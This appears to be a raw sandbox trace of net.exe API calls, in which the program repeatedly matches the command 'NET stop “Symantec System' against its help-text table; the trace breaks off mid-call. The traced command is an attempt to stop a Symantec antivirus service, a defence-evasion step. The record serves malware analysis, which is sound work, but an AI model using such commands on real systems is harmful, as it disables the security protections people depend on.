0x0 [0127.246] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x19 [0127.246] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x19) returned 16 [0127.246] LocalFree (hMem=0x3d5508) returned 0x0 [0127.246] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x1b [0127.246] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET FILE\r\n[id [/CLOSE]]\r\n", _MaxCount=0x19) returned 13 [0127.246] LocalFree (hMem=0x3d5508) returned 0x0 [0127.246] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xbe [0127.246] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET GROUP\r\n[groupname [/C", _MaxCount=0x19) returned 12 [0127.246] LocalFree (hMem=0x3d5508) returned 0x0 [0127.246] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x33 [0127.246] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET HELP\r\ncommand\r\n -", _MaxCount=0x19) returned 11 [0127.246] LocalFree (hMem=0x3d5508) returned 0x0 [0127.246] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x19 [0127.246] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x19) returned 11 [0127.246] LocalFree (hMem=0x3d5508) returned 0x0 [0127.246] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xc1 [0127.246] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET LOCALGROUP\r\n[groupnam", _MaxCount=0x19) returned 7 [0127.247] LocalFree (hMem=0x3d5508) returned 0x0 [0127.247] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x16 [0127.247] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x19) returned 3 [0127.247] LocalFree (hMem=0x3d5508) returned 0x0 [0127.247] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x33 [0127.247] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET SESSION\r\n[\\\\computern", _MaxCount=0x19) returned 15 [0127.247] LocalFree (hMem=0x3d5508) returned 0x0 [0127.247] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x234 [0127.247] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x19) returned 12 [0127.247] LocalFree (hMem=0x3d5508) returned 0x0 [0127.247] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x13 [0127.247] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET START BROWSER\r\n", _MaxCount=0x19) returned 14 [0127.247] LocalFree (hMem=0x3d5508) returned 0x0 [0127.247] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x14 [0127.247] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x19) returned 14 [0127.247] LocalFree (hMem=0x3d5508) returned 0x0 [0127.247] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x14 [0127.247] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET START EVENTLOG\r\n", _MaxCount=0x19) returned 14 [0127.247] LocalFree (hMem=0x3d5508) returned 0x0 [0127.247] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x15 [0127.247] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET START MESSENGER\r\n", _MaxCount=0x19) returned 14 [0127.247] LocalFree (hMem=0x3d5508) returned 0x0 [0127.247] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x15 [0127.247] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET START NET LOGON\r\n", _MaxCount=0x19) returned 14 [0127.247] LocalFree (hMem=0x3d5508) returned 0x0 [0127.247] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x16 [0127.247] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x19) returned 14 [0127.247] LocalFree (hMem=0x3d5508) returned 0x0 [0127.247] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x11 [0127.247] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET START RPCSS\r\n", _MaxCount=0x19) returned 14 [0127.247] LocalFree (hMem=0x3d5508) returned 0x0 [0127.247] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x14 [0127.247] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET START SCHEDULE\r\n", _MaxCount=0x19) returned 14 [0127.247] LocalFree (hMem=0x3d5508) returned 0x0 [0127.247] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x12 [0127.248] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET START SERVER\r\n", _MaxCount=0x19) returned 14 [0127.248] LocalFree (hMem=0x3d5508) returned 0x0 [0127.248] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xf [0127.248] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET START UPS\r\n", _MaxCount=0x19) returned 14 [0127.248] LocalFree (hMem=0x3d5508) returned 0x0 [0127.248] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x17 [0127.248] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET START WORKSTATION\r\n", _MaxCount=0x19) returned 14 [0127.248] LocalFree (hMem=0x3d5508) returned 0x0 [0127.248] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x18 [0127.248] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x19) returned 14 [0127.248] LocalFree (hMem=0x3d5508) returned 0x0 [0127.248] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x2a [0127.248] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET STATISTICS\r\n[WORKSTAT", _MaxCount=0x19) returned 14 [0127.248] LocalFree (hMem=0x3d5508) returned 0x0 [0127.248] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x15 [0127.248] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x19) returned 19 [0127.248] LocalFree (hMem=0x3d5508) returned 0x0 [0127.248] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x58 [0127.248] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET TIME\r\n\r\n[\\\\computerna", _MaxCount=0x19) returned -1 [0127.248] LocalFree (hMem=0x3d5508) returned 0x0 [0127.248] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x184 [0127.248] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET USE\r\n[devicename | *]", _MaxCount=0x19) returned -2 [0127.248] LocalFree (hMem=0x3d5508) returned 0x0 [0127.248] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xc7 [0127.248] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET USER\r\n[username [pass", _MaxCount=0x19) returned -2 [0127.248] LocalFree (hMem=0x3d5508) returned 0x0 [0127.248] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x47 [0127.248] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET VIEW\r\n[\\\\computername", _MaxCount=0x19) returned -3 [0127.248] LocalFree (hMem=0x3d5508) returned 0x0 [0127.248] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xc2 [0127.248] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NET\r\n [ ACCOUNTS | COM", _MaxCount=0x19) returned 19 [0127.248] LocalFree (hMem=0x3d5508) returned 0x0 [0127.248] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x319 [0127.249] _wcsnicmp (_String1="NET stop “Symantec System", _String2="SERVICES\r\nNET START can b", _MaxCount=0x19) returned -5 [0127.249] LocalFree (hMem=0x3d5508) returned 0x0 [0127.249] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x483 [0127.249] _wcsnicmp (_String1="NET stop “Symantec System", _String2="SYNTAX\r\nThe following con", _MaxCount=0x19) returned -5 [0127.249] LocalFree (hMem=0x3d5508) returned 0x0 [0127.249] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xa86 [0127.249] _wcsnicmp (_String1="NET stop “Symantec System", _String2="NAMES\r\nThe following type", _MaxCount=0x19) returned 4 [0127.249] LocalFree (hMem=0x3d5508) returned 0x0 [0127.249] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x54 [0127.249] _wcsnicmp (_String1="NET stop “Symantec System", _String2="\r\nFor more information on", _MaxCount=0x19) returned 97 [0127.249] LocalFree (hMem=0x3d5508) returned 0x0 [0127.249] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xad [0127.249] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET ACCOUNTS\r\n[/FO", _MaxCount=0x12) returned 18 [0127.249] LocalFree (hMem=0x3d5508) returned 0x0 [0127.249] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x2e [0127.249] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET COMPUTER\r\n\\\\co", _MaxCount=0x12) returned 16 [0127.249] LocalFree (hMem=0x3d5508) returned 0x0 [0127.249] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x7d [0127.249] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET CONFIG SERVER\r", _MaxCount=0x12) returned 16 [0127.249] LocalFree (hMem=0x3d5508) returned 0x0 [0127.249] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x26 [0127.249] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET CONFIG\r\n[SERVE", _MaxCount=0x12) returned 16 [0127.249] LocalFree (hMem=0x3d5508) returned 0x0 [0127.249] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x19 [0127.249] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET CONTINUE\r\nserv", _MaxCount=0x12) returned 16 [0127.249] LocalFree (hMem=0x3d5508) returned 0x0 [0127.249] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x1b [0127.249] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET FILE\r\n[id [/CL", _MaxCount=0x12) returned 13 [0127.249] LocalFree (hMem=0x3d5508) returned 0x0 [0127.249] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xbe [0127.249] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET GROUP\r\n[groupn", _MaxCount=0x12) returned 12 [0127.249] LocalFree (hMem=0x3d5508) returned 0x0 [0127.249] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x33 [0127.250] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET HELP\r\ncommand\r", _MaxCount=0x12) returned 11 [0127.250] LocalFree (hMem=0x3d5508) returned 0x0 [0127.250] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x19 [0127.250] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET HELPMSG\r\nmessa", _MaxCount=0x12) returned 11 [0127.250] LocalFree (hMem=0x3d5508) returned 0x0 [0127.250] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0xc1 [0127.250] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET LOCALGROUP\r\n[g", _MaxCount=0x12) returned 7 [0127.250] LocalFree (hMem=0x3d5508) returned 0x0 [0127.250] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x16 [0127.250] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET PAUSE\r\nservice", _MaxCount=0x12) returned 3 [0127.250] LocalFree (hMem=0x3d5508) returned 0x0 [0127.250] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x33 [0127.250] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET SESSION\r\n[\\\\co", _MaxCount=0x12) returned 15 [0127.250] LocalFree (hMem=0x3d5508) returned 0x0 [0127.250] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x234 [0127.250] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET SHARE\r\nsharena", _MaxCount=0x12) returned 12 [0127.250] LocalFree (hMem=0x3d5508) returned 0x0 [0127.250] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x13 [0127.250] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET START BROWSER\r", _MaxCount=0x12) returned 14 [0127.250] LocalFree (hMem=0x3d5508) returned 0x0 [0127.250] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x14 [0127.250] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET START CLIPBOOK", _MaxCount=0x12) returned 14 [0127.250] LocalFree (hMem=0x3d5508) returned 0x0 [0127.250] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x14 [0127.250] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET START EVENTLOG", _MaxCount=0x12) returned 14 [0127.250] LocalFree (hMem=0x3d5508) returned 0x0 [0127.250] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="唈=⡋盺侮/唈=塞/") returned 0x15 [0127.250] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET START MESSENGE", _MaxCount=0x12) returned 14 [0127.250] LocalFree (hMem=0x3d5508) returned 0x0 [0127.250] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="甈=⡋盺侮/唈=塞/") returned 0x15 [0127.250] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET START NET LOGO", _MaxCount=0x12) returned 14 [0127.250] LocalFree (hMem=0x3d7508) returned 0x0 [0127.250] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/甈=塞/") returned 0x16 [0127.251] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET START RPCLOCAT", _MaxCount=0x12) returned 14 [0127.251] LocalFree (hMem=0x3d9508) returned 0x0 [0127.251] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x11 [0127.251] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET START RPCSS\r\n", _MaxCount=0x12) returned 14 [0127.251] LocalFree (hMem=0x3d9508) returned 0x0 [0127.251] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x14 [0127.251] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET START SCHEDULE", _MaxCount=0x12) returned 14 [0127.251] LocalFree (hMem=0x3d9508) returned 0x0 [0127.251] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x12 [0127.251] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET START SERVER\r\n", _MaxCount=0x12) returned 14 [0127.251] LocalFree (hMem=0x3d9508) returned 0x0 [0127.251] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0xf [0127.251] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET START UPS\r\n", _MaxCount=0x12) returned 14 [0127.251] LocalFree (hMem=0x3d9508) returned 0x0 [0127.251] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x17 [0127.251] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET START WORKSTAT", _MaxCount=0x12) returned 14 [0127.251] LocalFree (hMem=0x3d9508) returned 0x0 [0127.251] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x18 [0127.251] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET START\r\n[servic", _MaxCount=0x12) returned 14 [0127.251] LocalFree (hMem=0x3d9508) returned 0x0 [0127.251] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x2a [0127.251] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET STATISTICS\r\n[W", _MaxCount=0x12) returned 14 [0127.251] LocalFree (hMem=0x3d9508) returned 0x0 [0127.251] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x15 [0127.251] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET STOP\r\nservice\r", _MaxCount=0x12) returned 19 [0127.251] LocalFree (hMem=0x3d9508) returned 0x0 [0127.251] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x58 [0127.251] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET TIME\r\n\r\n[\\\\com", _MaxCount=0x12) returned -1 [0127.251] LocalFree (hMem=0x3d9508) returned 0x0 [0127.251] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x184 [0127.251] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET USE\r\n[devicena", _MaxCount=0x12) returned -2 [0127.251] LocalFree (hMem=0x3d9508) returned 0x0 [0127.251] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0xc7 [0127.252] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET USER\r\n[usernam", _MaxCount=0x12) returned -2 [0127.252] LocalFree (hMem=0x3d9508) returned 0x0 [0127.252] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x47 [0127.252] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET VIEW\r\n[\\\\compu", _MaxCount=0x12) returned -3 [0127.252] LocalFree (hMem=0x3d9508) returned 0x0 [0127.252] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0xc2 [0127.252] _wcsnicmp (_String1="NET stop “Symantec", _String2="NET\r\n [ ACCOUNT", _MaxCount=0x12) returned 19 [0127.252] LocalFree (hMem=0x3d9508) returned 0x0 [0127.252] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x319 [0127.252] _wcsnicmp (_String1="NET stop “Symantec", _String2="SERVICES\r\nNET STAR", _MaxCount=0x12) returned -5 [0127.252] LocalFree (hMem=0x3d9508) returned 0x0 [0127.252] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x483 [0127.252] _wcsnicmp (_String1="NET stop “Symantec", _String2="SYNTAX\r\nThe follow", _MaxCount=0x12) returned -5 [0127.252] LocalFree (hMem=0x3d9508) returned 0x0 [0127.252] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, 